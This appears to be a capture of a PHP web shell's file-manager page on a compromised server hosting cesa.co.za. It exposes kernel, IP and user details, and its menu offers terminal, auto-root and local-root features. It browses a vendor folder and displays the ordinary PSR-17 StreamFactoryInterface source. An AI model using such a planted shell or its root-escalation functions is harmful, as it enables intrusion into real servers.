Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
vendor /
psr /
http-factory /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
RequestFactoryInterface.php
499
B
-rw-r--r--
2025-12-08 10:53
ResponseFactoryInterface.php
546
B
-rw-r--r--
2025-12-08 10:53
ServerRequestFactoryInterface.php
927
B
-rw-r--r--
2025-12-08 10:53
StreamFactoryInterface.php
1.38
KB
-rw-r--r--
2025-12-08 10:53
UploadedFileFactoryInterface.php
1.1
KB
-rw-r--r--
2025-12-08 10:53
UriFactoryInterface.php
325
B
-rw-r--r--
2025-12-08 10:53
Save
Rename
<?php namespace Psr\Http\Message; interface StreamFactoryInterface { /** * Create a new stream from a string. * * The stream SHOULD be created with a temporary resource. * * @param string $content String content with which to populate the stream. * * @return StreamInterface */ public function createStream(string $content = ''): StreamInterface; /** * Create a stream from an existing file. * * The file MUST be opened using the given mode, which may be any mode * supported by the `fopen` function. * * The `$filename` MAY be any string supported by `fopen()`. * * @param string $filename Filename or stream URI to use as basis of stream. * @param string $mode Mode with which to open the underlying filename/stream. * * @return StreamInterface * @throws \RuntimeException If the file cannot be opened. * @throws \InvalidArgumentException If the mode is invalid. */ public function createStreamFromFile(string $filename, string $mode = 'r'): StreamInterface; /** * Create a new stream from an existing resource. * * The stream MUST be readable and may be writable. * * @param resource $resource PHP resource to use as basis of stream. * * @return StreamInterface */ public function createStreamFromResource($resource): StreamInterface; }